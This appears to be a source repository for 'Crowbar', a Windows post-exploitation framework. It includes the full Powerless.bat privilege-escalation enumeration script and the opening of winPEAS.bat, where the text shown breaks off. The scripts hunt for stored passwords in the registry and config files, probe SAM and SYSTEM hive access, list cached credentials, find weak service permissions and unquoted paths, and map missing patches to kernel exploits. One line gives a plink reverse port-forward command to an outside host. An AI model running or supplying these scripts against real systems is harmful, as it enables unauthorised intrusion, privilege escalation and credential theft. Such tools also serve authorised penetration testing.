├── README.md ├── escalate ├── Powerless.bat ├── winPEAS.bat └── winprivesc.bat ├── main.py ├── requirements.bat ├── scripts ├── getunconstrained.ps1 ├── iisconfig.ps1 ├── list_antivirus.bat ├── listarptables.ps1 ├── listcredentials.ps1 ├── listnetworkinter.ps1 ├── listprogramsfol.ps1 ├── listprogramsreg.ps1 ├── removeupdate.ps1 ├── routingtable.ps1 ├── sensitive_data_search.ps1 └── unquoteservice.ps1 └── util ├── AvTrigger ├── main.go └── video.mov ├── VM-Detect ├── example.cpp └── vmdetect.h ├── disable_firewall.ps1 ├── get_powershell_history.ps1 ├── list_firewall_blocked_ports.ps1 └── screencapture.py /README.md: -------------------------------------------------------------------------------- 1 | # Crowbar - A windows post exploitation tool 2 | ![image](https://user-images.githubusercontent.com/78043996/115156390-0d8c6800-a052-11eb-9821-8cfd1f765114.png) 3 | # Status - ✔️ 4 | This project is now considered finished. Any updates from now on will most likely be new scripts/utilities or just bug fixes. I will try to update/add anything I can to improve this project as frequently as possible. More coming soon! 5 | # Update logs 6 | [4/25/21] - Added 2 new scripts and 5 utilities. Added a new option in the main menu called 'WSL' which checks to see if the target machine has 'Windows Subsystem for Linux' installed. 7 | 8 | [4/24/21] - Added new scripts and fixed minor issues. Added an extra utility. 9 | 10 | [4/18/21] - Added a new directory called 'Escalate' to aid in the process of privilege escalation, added 3 more scripts, added a new feature for the 'Scripts' directory called 'Hail Mary' which launches all of the scripts against the target machine, removed 1 broken utility, and fixed minor bugs. More stuff coming out soon. 11 | 12 | [4/15/21] - Added a new tool called 'iPower' for executing system commands via PowerShell. Fixed minor bugs, added a powershell script execution bypass, and fixed up the powershell modules. More scripts and utilities coming soon. 13 | 14 | [4/15/21] - Crowbar V2! The whole framework was completely recoded and re-designed. I have added 30 scripts and 1 extra utility. 15 | 16 | [4/15/21] - Whole rework coming soon. 17 | 18 | [4/14/21] - Added 'iMonitor' menu. Fixed some minor menu issues. Added 6 scripts and 2 extra utilities. 19 | 20 | [4/13/21] - Added 'Connect Hub' menu. Fixed minor issues. 21 | # Installation 22 | [Make sure you have CMD open in the Crowbar folder] 23 | 24 | [And yes, to execute the .bat file just put the name and the extension.] 25 | ``` 26 | requirements.bat 27 | python main.py 28 | ``` 29 | # Screenshots 30 | ![image](https://user-images.githubusercontent.com/78043996/116015292-a9941180-a606-11eb-9881-875cb6318b45.png) 31 | ![image](https://user-images.githubusercontent.com/78043996/116015306-b9abf100-a606-11eb-9fe4-d26655dfc07a.png) 32 | ![image](https://user-images.githubusercontent.com/78043996/116015314-c6c8e000-a606-11eb-8dff-e023cf52ccf0.png) 33 | ![image](https://user-images.githubusercontent.com/78043996/116015356-e8c26280-a606-11eb-9479-037b572b4b2d.png) 34 | ![image](https://user-images.githubusercontent.com/78043996/116015372-fb3c9c00-a606-11eb-9c1b-bcdb2aaa006f.png) 35 | -------------------------------------------------------------------------------- /escalate/Powerless.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | set userprofile=%cd% 3 | mode con:cols=160 lines=9999 4 | Cd c:\ 5 | 6 | echo ------ System Info (Use full output in conjunction with windows-exploit-suggester.py)------- 7 | :: https://github.com/GDSSecurity/Windows-Exploit-Suggester 8 | systeminfo 9 | echo. 10 | 11 | echo ----- Architecture ------- 12 | SET Processor 13 | echo. 14 | 15 | echo ------ Users and groups (check individual user with 'net user USERNAME' ) Check user privileges for SeImpersonate (rotten potato exploit) ------- 16 | :: Note, in CTF boxes its not uncommon to see other low level users on the machine. It can be a temptation to want to always skip to Administrator, but sometimes it is essential that you elevate privileges to that of a different user first before being able to get admin rights. Once you get that users rights, pay close attention to their user folder. 17 | echo Current User: %username% 18 | whoami /all 19 | echo --- All users, accounts and groups --- 20 | net users 21 | net accounts 22 | net localgroup 23 | 24 | echo ------- Administrators -------- 25 | net localgroup administrators 26 | 27 | echo ------- Environment Variables ------- 28 | set 29 | echo. 30 | 31 | echo ------- Additional Drives (if not run as part of a batch job replace double percent with single percent sign)-------- 32 | for %%i in (a b d e f g h i j k l m n o p q r s t u v w x y z) do @dir %%i: 2>nul 33 | echo. 34 | 35 | echo ---------------------------------------- Search for Quick Wins -------------------------------------- 36 | echo -------- Listing contents of user directories --------- 37 | :: In CTF machines it is VERY common for there to be artifacts used for privilege escalation within user directories. Pay special attention for files that may contain credentials, or files that maybe used as part of a scheduled task. You can typically ignore most default windows files (some of which have been filtered out as part of this script). 38 | dir "C:\Users\" /a /b /s 2>nul | findstr /v /i "Favorites\\" | findstr /v /i "AppData\\" | findstr /v /i "Microsoft\\" | findstr /v /i "Application Data\\" 39 | dir "C:\Documents and Settings\" /a /b /s 2>nul | findstr /v /i "Favorites\\" | findstr /v /i "AppData\\" | findstr /v /i "Microsoft\\" | findstr /v /i "Application Data\\" 40 | echo. 41 | 42 | echo -------- Exploring program directories and C:\ --------- 43 | :: These directory listings are not recursive. They are meant to give you a general overview of the programs installed on the system. Searchsploit every (non default/windows) program version, and check each program config for creds. 44 | echo --- Program Files --- 45 | dir "C:\Program Files" /b 46 | echo --- Program Files (x86) --- 47 | dir "C:\Program Files (x86)" /b 48 | echo --- Root of C:\ ---- 49 | dir "C:\" /b 50 | echo. 51 | 52 | echo --- Inetpub (any config files in here? May need to manually drill into this folder if it exists) --- 53 | :: The root web folder can at times be extensive, and thus we do not always want to show a recursive listing of its contents in this script but it should always be investigated regardless. 54 | dir /a /b C:\inetpub\ 55 | 56 | echo --- Broad search for Apache or Xampp --- 57 | dir /s /b apache* xampp* 58 | echo. 59 | 60 | echo ---Search for Configuration and sensitive files--- 61 | echo -- Broad search for config files -- 62 | :: If the .NET framework is installed you will get a bunch of config files which are typically default and can be ignored. The more you practice priv esc. the more youll learn which files can be ignored, and which you should give a closer eye to. 63 | dir /s /b php.ini httpd.conf httpd-xampp.conf my.ini my.cnf web.config 64 | echo -- Application Host File -- 65 | type C:\Windows\System32\inetsrv\config\applicationHost.config 2>nul 66 | echo -- Broad search for unattend or sysprep files -- 67 | dir /b /s unattended.xml* sysprep.xml* sysprep.inf* unattend.xml* 68 | echo -- Stored Passwords -- 69 | :: To use stored cmdkey credentials use runas with /savecred flag (e.g. runas /savecred /user:ACCESS\Administrator "ping 10.10.10.9") 70 | cmdkey /list 71 | echo. 72 | 73 | echo -- Checking for any accessible SAM or SYSTEM files -- 74 | dir %SYSTEMROOT%\repair\SAM 2>nul 75 | dir %SYSTEMROOT%\System32\config\RegBack\SAM 2>nul 76 | dir %SYSTEMROOT%\System32\config\SAM 2>nul 77 | dir %SYSTEMROOT%\repair\system 2>nul 78 | dir %SYSTEMROOT%\System32\config\SYSTEM 2>nul 79 | dir %SYSTEMROOT%\System32\config\RegBack\system 2>nul 80 | dir /a /b /s SAM.b* 81 | echo. 82 | 83 | echo -- Broad search for vnc kdbx or rdp files -- 84 | dir /a /s /b *.kdbx *vnc.ini *.rdp 85 | echo. 86 | 87 | echo --- Searching Registry for Passwords --- 88 | reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword" 89 | reg query HKLM /f password /t REG_SZ /s /k 90 | reg query HKCU /f password /t REG_SZ /s /k 91 | reg query "HKCU\Software\ORL\WinVNC3\Password" 92 | reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" 93 | reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" 94 | echo. 95 | 96 | echo --- AlwaysInstallElevated Check --- 97 | reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated 98 | reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated 99 | echo. 100 | 101 | echo --- Program Files and User Directories where everybody (or users) have full or modify permissions --- 102 | where /q icacls 103 | IF ERRORLEVEL 1 ( 104 | echo icacls is missing, performing checks using cacls for older versions of Windows 105 | FOR /F "tokens=* USEBACKQ" %%F IN (`where cacls`) DO (SET cacls_exe=%%F) 106 | ) ELSE ( 107 | FOR /F "tokens=* USEBACKQ" %%F IN (`where icacls`) DO (SET cacls_exe=%%F) 108 | ) 109 | %cacls_exe% "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone" 110 | %cacls_exe% "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone" 111 | %cacls_exe% "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users" 112 | %cacls_exe% "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users" 113 | %cacls_exe% "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "Everyone" 114 | %cacls_exe% "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "Everyone" 115 | %cacls_exe% "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users" 116 | %cacls_exe% "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users" 117 | %cacls_exe% "C:\Documents and Settings\*" 2>nul | findstr "(F)" | findstr "Everyone" 118 | %cacls_exe% "C:\Documents and Settings\*" 2>nul | findstr "(M)" | findstr "Everyone" 119 | %cacls_exe% "C:\Documents and Settings\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users" 120 | %cacls_exe% "C:\Documents and Settings\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users" 121 | %cacls_exe% "C:\Users\*" 2>nul | findstr "(F)" | findstr "Everyone" 122 | %cacls_exe% "C:\Users\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users" 123 | %cacls_exe% "C:\Users\*" 2>nul | findstr "(M)" | findstr "Everyone" 124 | %cacls_exe% "C:\Users\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users" 125 | %cacls_exe% "C:\Documents and Settings\*" /T 2>nul | findstr ":F" | findstr "BUILTIN\Users" 126 | %cacls_exe% "C:\Users\*" /T 2>nul | findstr ":F" | findstr "BUILTIN\Users" 127 | echo. 128 | 129 | echo ---Domain joined? If so check domain controller for GPP files ---- 130 | set user 131 | echo. 132 | 133 | cd %userprofile% 134 | echo ---Unquoted Service Paths (requires that the directory from which this script is run is user writeable. If it is not, you can use the WMIC command below) --- 135 | REM wmic service get name,displayname,pathname,startmode 2>nul |findstr /i "Auto" 2>nul |findstr /i /v "C:\Windows\\" 2>nul |findstr /i /v """ 136 | sc query state= all > scoutput.txt 137 | findstr "SERVICE_NAME:" scoutput.txt > Servicenames.txt 138 | FOR /F "tokens=2 delims= " %%i in (Servicenames.txt) DO @echo %%i >> services.txt 139 | FOR /F %%i in (services.txt) DO @sc qc %%i | findstr "BINARY_PATH_NAME" >> path.txt 140 | find /v """" path.txt > unquotedpaths.txt 141 | sort unquotedpaths.txt|findstr /i /v C:\WINDOWS 142 | del /f Servicenames.txt 143 | del /f services.txt 144 | del /f path.txt 145 | del /f scoutput.txt 146 | del /f unquotedpaths.txt 147 | echo. 148 | 149 | echo --------------- AccessChk (checks permissions for Authenticated Users, Everyone, and Users)------------------ 150 | reg.exe ADD "HKCU\Software\Sysinternals\AccessChk" /v EulaAccepted /t REG_DWORD /d 1 /f 151 | 152 | echo --- Accesschk World writeable folders and files ---- 153 | accesschk.exe -uwdqs "Users" c:\ /accepteula 154 | accesschk.exe -uwdqs "Authenticated Users" c:\ /accepteula 155 | accesschk.exe -qwsu "Everyone" * /accepteula 156 | accesschk.exe -qwsu "Authenticated Users" * /accepteula 157 | accesschk.exe -qwsu "Users" * /accepteula 158 | echo. 159 | echo --- Accesschk services with weak permissions --- 160 | accesschk.exe -uwcqv "Authenticated Users" * /accepteula 161 | accesschk.exe -uwcqv "Everyone" * /accepteula 162 | accesschk.exe -uwcqv "Users" * /accepteula 163 | echo. 164 | echo --- Accesschk services that we can change registry values for (such as ImagePath) --- 165 | accesschk.exe -kvqwsu "Everyone" hklm\system\currentcontrolset\services /accepteula 166 | accesschk.exe -kvqwsu "Authenticated Users" hklm\system\currentcontrolset\services /accepteula 167 | accesschk.exe -kvqwsu "Users" hklm\system\currentcontrolset\services /accepteula 168 | echo. 169 | echo ---------------------------------------- End Search for Quick Wins -------------------------------------- 170 | 171 | cd c:\ 172 | echo ------- Powershell existence/version check ------- 173 | REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion 174 | 175 | echo ------- Network shares ------- 176 | net share 177 | 178 | echo ------- Programs that run at startup ------ 179 | :: Note on some legacy Windows editions WMIC may fail to install/start/freeze in which case you'll need to comment out any calls to wmic 180 | wmic startup get caption,command 181 | 182 | echo -------- Path (is dll hijacking possible?) ------ 183 | echo Getting system + user path from command line (check permissions using cacls [path] or accesschk.exe -dqv [path])... 184 | echo %path% 185 | echo. 186 | :: I couldnt find a way to only get system path in DOS (user path does not matter for the purpose of dll hijacking). If powershell is available you can use folderperm.ps1 script 187 | :: https://github.com/ankh2054/windows-pentest/blob/master/Powershell/folderperms.ps1 188 | :: powershell.exe -ExecutionPolicy Bypass -noLogo -Command "[Environment]::GetEnvironmentVariable('Path', [System.EnvironmentVariableTarget]::Machine)" 189 | :: Or let the script do all the work for you 190 | :: powershell.exe -executionpolicy bypass -file folderperm.ps1 191 | 192 | echo ------- Scheduled Tasks Names Only ------- 193 | :: Look for any interesting/non-standard scheduled tasks, then view the scheduled task details list below to get a better idea of what that task is doing and who is running it). 194 | schtasks /query /fo LIST 2>nul | findstr "TaskName" 195 | echo. 196 | 197 | echo ------- Scheduled Tasks Details (taskname, author, command run, run as user) ------- 198 | schtasks /query /fo LIST /v | findstr "TaskName Author: Run: User:" 199 | echo. 200 | 201 | echo ------- Services Currently Running (check for Windows Defender or Anti-virus) --------- 202 | net start 203 | echo. 204 | 205 | echo ------- Link Running Processes to started services -------- 206 | tasklist /SVC 207 | echo. 208 | 209 | echo ------- Processes verbose output (who is running what?) -------- 210 | :: Pay close attention to this list. Especially for those tasks run by a user other than your own. 211 | tasklist /v 212 | echo. 213 | 214 | echo ------- Patches (also listed as part of systeminfo) ------- 215 | :: Note on some legacy Windows editions WMIC may fail to install/start/freeze in which case you'll need to comment out any calls to wmic 216 | :: Systeminfo may at times fail to list all patches (instead showing 'file x' or something along those lines) in which case its important to have this fallback. 217 | wmic qfe get Caption,Description,HotFixID,InstalledOn 218 | 219 | echo ------- Firewall ------ 220 | netsh firewall show state 221 | netsh firewall show config 222 | netsh advfirewall firewall dump 223 | 224 | echo ------ Network information ------ 225 | ipconfig /all 226 | 227 | :: Routing and ARP tables accessible with these commands... uncomment if you wish, I didnt typically find them helpful for priv esc. 228 | REM route print 229 | REM arp -A 230 | echo. 231 | 232 | echo ------- Current connections and listening ports ------- 233 | :: Reverse port forward anything that is not accessible remotely, and run nmap on it. If SMB is available locally, do you have creds or hashes you can pass through it after port forwarding? 234 | netstat -ano 235 | echo. 236 | echo ------- REVERSE PORT FORWARD MULTIPLE PORTS AT ONCE: plink.exe -l username -pw mysecretpassword -P [port] 10.11.0.108 -R 8080:127.0.0.1:8080 -R 8000:127.0.0.1:8000 -R 443:127.0.0.1:443 ------------ 237 | echo. 238 | 239 | echo --- Broad search for any possible config files which may contain passwords --- 240 | :: The following broad config file and credential searches could result in many results. They are meant as a fall back once you have already done thorough enumeration of user directories, web directories, and program directories (in addition to having pillaged the db). 241 | dir /s /b *pass* *cred* *vnc* *.config* 242 | echo. 243 | 244 | echo --- Starting broad search in the background for any files with the word password in it. Press enter to get status occasionally --" 245 | start /b findstr /sim password *.xml *.ini *.txt *.config *.bak 2>nul 246 | echo. 247 | -------------------------------------------------------------------------------- /escalate/winPEAS.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF & SETLOCAL EnableDelayedExpansion 2 | TITLE WinPEAS - Windows local Privilege Escalation Awesome Script 3 | COLOR 0F 4 | CALL :SetOnce 5 | 6 | REM :: WinPEAS - Windows local Privilege Escalation Awesome Script 7 | REM :: Code by carlospolop; Re-Write by ThisLimn0 8 | 9 | REM Registry scan of other drives besides 10 | REM /////true or false 11 | SET long=false 12 | 13 | :Splash 14 | ECHO. 15 | CALL :ColorLine " %E%32m((,.,/((((((((((((((((((((/, */%E%97m" 16 | CALL :ColorLine " %E%32m,/*,..*(((((((((((((((((((((((((((((((((,%E%97m" 17 | CALL :ColorLine " %E%32m,*/((((((((((((((((((/, %E%92m.*//((//**,%E%32m .*((((((*%E%97m" 18 | CALL :ColorLine " %E%32m((((((((((((((((* %E%94m*****%E%32m,,,/########## %E%32m.(* ,((((((%E%97m" 19 | CALL :ColorLine " %E%32m(((((((((((/* %E%94m******************%E%32m/####### %E%32m.(. ((((((%E%97m" 20 | CALL :ColorLine " %E%32m((((((.%E%92m.%E%94m******************%E%97m/@@@@@/%E%94m***%E%92m/######%E%32m /((((((%E%97m" 21 | CALL :ColorLine " %E%32m,,.%E%92m.%E%94m**********************%E%97m@@@@@@@@@@(%E%94m***%E%92m,####%E%32m ../(((((%E%97m" 22 | CALL :ColorLine " %E%32m, ,%E%92m%E%94m**********************%E%97m#@@@@@#@@@@%E%94m*********%E%92m##%E%32m((/ /((((%E%97m" 23 | CALL :ColorLine " %E%32m..((%E%92m(##########%E%94m*********%E%97m/#@@@@@@@@@/%E%94m*************%E%32m,,..((((%E%97m" 24 | CALL :ColorLine " %E%32m.((%E%92m(################(/%E%94m******%E%97m/@@@@@#%E%94m****************%E%32m.. /((%E%97m" 25 | CALL :ColorLine " %E%32m.(%E%92m(########################(/%E%94m************************%E%32m..*(%E%97m" 26 | CALL :ColorLine " %E%32m.(%E%92m(#############################(/%E%94m********************%E%32m.,(%E%97m" 27 | CALL :ColorLine " %E%32m.(%E%92m(##################################(/%E%94m***************%E%32m..(%E%97m" 28 | CALL :ColorLine " %E%32m.(%E%92m(######################################(%E%94m************%E%32m..(%E%97m" 29 | CALL :ColorLine " %E%32m.(%E%92m(######(,.***.,(###################(..***(/%E%94m*********%E%32m..(%E%97m" 30 | CALL :ColorLine " %E%32m.(%E%92m(######*(#####((##################((######/(%E%94m********%E%32m..(%E%97m" 31 | CALL :ColorLine " %E%32m.(%E%92m(##################(/**********(################(%E%94m**%E%32m...(%E%97m" 32 | CALL :ColorLine " %E%32m.((%E%92m(####################/*******(###################%E%32m.((((%E%97m" 33 | CALL :ColorLine " %E%32m.((((%E%92m(############################################/%E%32m /((%E%97m" 34 | CALL :ColorLine " %E%32m..((((%E%92m(#########################################(%E%32m..(((((.%E%97m" 35 | CALL :ColorLine " %E%32m....((((%E%92m(#####################################(%E%32m .((((((.%E%97m" 36 | CALL :ColorLine " %E%32m......((((%E%92m(#################################(%E%32m .(((((((.%E%97m" 37 | CALL :ColorLine " %E%32m(((((((((. ,%E%92m(############################(%E%32m../(((((((((.%E%97m" 38 | CALL :ColorLine " %E%32m(((((((((/, %E%92m,####################(%E%32m/..((((((((((.%E%97m" 39 | CALL :ColorLine " %E%32m(((((((((/,. %E%92m,*//////*,.%E%32m ./(((((((((((.%E%97m" 40 | CALL :ColorLine " %E%32m(((((((((((((((((((((((((((/%E%97m" 41 | ECHO. by carlospolop 42 | ECHO. 43 | ECHO. 44 | 45 | :Advisory 46 | REM // Increase progress in title by n percent 47 | CALL :T_Progress 0 48 | ECHO./^^!\ Advisory: WinPEAS - Windows local Privilege Escalation Awesome Script 49 | CALL :ColorLine " %E%41mWinPEAS should be used for authorized penetration testing and/or educational purposes only.%E%40;97m" 50 | CALL :ColorLine " %E%41mAny misuse of this software will not be the responsibility of the author or of any other collaborator.%E%40;97m" 51 | CALL :ColorLine " %E%41mUse it at your own networks and/or with the network owner's permission.%E%40;97m" 52 | ECHO. 53 | 54 | :SystemInfo 55 | CALL :ColorLine "%E%32m[*]%E%97m BASIC SYSTEM INFO 56 | CALL :ColorLine " %E%33m[+]%E%97m WINDOWS OS" 57 | ECHO. [i] Check for vulnerabilities for the OS version with the applied patches 58 | ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#kernel-exploits 59 | systeminfo 60 | ECHO. 61 | CALL :T_Progress 2 62 | 63 | :ListHotFixes 64 | wmic qfe get Caption,Description,HotFixID,InstalledOn | more 65 | set expl=no 66 | for /f "tokens=3-9" %%a in ('systeminfo') do (ECHO."%%a %%b %%c %%d %%e %%f %%g" | findstr /i "2000 XP 2003 2008 vista" && set expl=yes) & (ECHO."%%a %%b %%c %%d %%e %%f %%g" | findstr /i /C:"windows 7" && set expl=yes) 67 | IF "%expl%" == "yes" ECHO. [i] Possible exploits (https://github.com/codingo/OSCP-2/blob/master/Windows/WinPrivCheck.bat) 68 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2592799" 1>NUL 69 | IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS11-080 patch is NOT installed! (Vulns: XP/SP3,2K3/SP3-afd.sys) 70 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB3143141" 1>NUL 71 | IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS16-032 patch is NOT installed! (Vulns: 2K8/SP1/2,Vista/SP2,7/SP1-secondary logon) 72 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2393802" 1>NUL 73 | IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS11-011 patch is NOT installed! (Vulns: XP/SP2/3,2K3/SP2,2K8/SP2,Vista/SP1/2,7/SP0-WmiTraceMessageVa) 74 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB982799" 1>NUL 75 | IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS10-59 patch is NOT installed! (Vulns: 2K8,Vista,7/SP0-Chimichurri) 76 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB979683" 1>NUL 77 | IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS10-21 patch is NOT installed! (Vulns: 2K/SP4,XP/SP2/3,2K3/SP2,2K8/SP2,Vista/SP0/1/2,7/SP0-Win Kernel) 78 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2305420" 1>NUL 79 | IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS10-092 patch is NOT installed! (Vulns: 2K8/SP0/1/2,Vista/SP1/2,7/SP0-Task Sched) 80 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB981957" 1>NUL 81 | IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS10-073 patch is NOT installed! (Vulns: XP/SP2/3,2K3/SP2/2K8/SP2,Vista/SP1/2,7/SP0-Keyboard Layout) 82 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB4013081" 1>NUL 83 | IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS17-017 patch is NOT installed! (Vulns: 2K8/SP2,Vista/SP2,7/SP1-Registry Hive Loading) 84 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB977165" 1>NUL 85 | IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS10-015 patch is NOT installed! (Vulns: 2K,XP,2K3,2K8,Vista,7-User Mode to Ring) 86 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB941693" 1>NUL 87 | IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS08-025 patch is NOT installed! (Vulns: 2K/SP4,XP/SP2,2K3/SP1/2,2K8/SP0,Vista/SP0/1-win32k.sys) 88 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB920958" 1>NUL 89 | IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS06-049 patch is NOT installed! (Vulns: 2K/SP4-ZwQuerySysInfo) 90 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB914389" 1>NUL 91 | IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS06-030 patch is NOT installed! (Vulns: 2K,XP/SP2-Mrxsmb.sys) 92 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB908523" 1>NUL 93 | IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS05-055 patch is NOT installed! (Vulns: 2K/SP4-APC Data-Free) 94 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB890859" 1>NUL 95 | IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS05-018 patch is NOT installed! (Vulns: 2K/SP3/4,XP/SP1/2-CSRSS) 96 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB842526" 1>NUL 97 | IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS04-019 patch is NOT installed! (Vulns: 2K/SP2/3/4-Utility Manager) 98 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB835732" 1>NUL 99 | IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS04-011 patch is NOT installed! (Vulns: 2K/SP2/3/4,XP/SP0/1-LSASS service BoF) 100 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB841872" 1>NUL 101 | IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS04-020 patch is NOT installed! (Vulns: 2K/SP4-POSIX) 102 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2975684" 1>NUL 103 | IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS14-040 patch is NOT installed! (Vulns: 2K3/SP2,2K8/SP2,Vista/SP2,7/SP1-afd.sys Dangling Pointer) 104 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB3136041" 1>NUL 105 | IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS16-016 patch is NOT installed! (Vulns: 2K8/SP1/2,Vista/SP2,7/SP1-WebDAV to Address) 106 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB3057191" 1>NUL 107 | IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS15-051 patch is NOT installed! (Vulns: 2K3/SP2,2K8/SP2,Vista/SP2,7/SP1-win32k.sys) 108 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2989935" 1>NUL 109 | IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS14-070 patch is NOT installed! (Vulns: 2K3/SP2-TCP/IP) 110 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2778930" 1>NUL 111 | IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS13-005 patch is NOT installed! (Vulns: Vista,7,8,2008,2008R2,2012,RT-hwnd_broadcast) 112 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2850851" 1>NUL 113 | IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS13-053 patch is NOT installed! (Vulns: 7SP0/SP1_x86-schlamperei) 114 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2870008" 1>NUL 115 | IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS13-081 patch is NOT installed! (Vulns: 7SP0/SP1_x86-track_popup_menu) 116 | ECHO. 117 | CALL :T_Progress 2 118 | 119 | :DateAndTime 120 | CALL :ColorLine " %E%33m[+]%E%97m DATE and TIME" 121 | ECHO. [i] You may need to adjust your local date/time to exploit some vulnerability 122 | date /T 123 | time /T 124 | ECHO. 125 | CALL :T_Progress 2 126 | 127 | :AuditSettings 128 | CALL :ColorLine " %E%33m[+]%E%97m Audit Settings" 129 | ECHO. [i] Check what is being logged 130 | REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit 2>nul 131 | ECHO. 132 | CALL :T_Progress 1 133 | 134 | :WEFSettings 135 | CALL :ColorLine " %E%33m[+]%E%97m WEF Settings" 136 | ECHO. [i] Check where are being sent the logs 137 | REG QUERY HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager 2>nul 138 | ECHO. 139 | CALL :T_Progress 1 140 | 141 | :LAPSInstallCheck 142 | CALL :ColorLine " %E%33m[+]%E%97m LAPS installed?" 143 | ECHO. [i] Check what is being logged 144 | REG QUERY "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft Services\AdmPwd" /v AdmPwdEnabled 2>nul 145 | ECHO. 146 | CALL :T_Progress 1 147 | 148 | :LSAProtectionCheck 149 | CALL :ColorLine " %E%33m[+]%E%97m LSA protection?" 150 | ECHO. [i] Active if "1" 151 | REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA" /v RunAsPPL 2>nul 152 | CALL :T_Progress 1 153 | 154 | :LSACredentialGuard 155 | CALL :ColorLine " %E%33m[+]%E%97m Credential Guard?" 156 | ECHO. [i] Active if "1" or "2" 157 | REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA" /v LsaCfgFlags 2>nul 158 | ECHO. 159 | CALL :T_Progress 1 160 | 161 | :LogonCredentialsPlainInMemory 162 | CALL :ColorLine " %E%33m[+]%E%97m WDigest?" 163 | ECHO. [i] Plain-text creds in memory if "1" 164 | reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential 2>nul 165 | ECHO. 166 | CALL :T_Progress 1 167 | 168 | :CachedCreds 169 | CALL :ColorLine " %E%33m[+]%E%97m Number of cached creds" 170 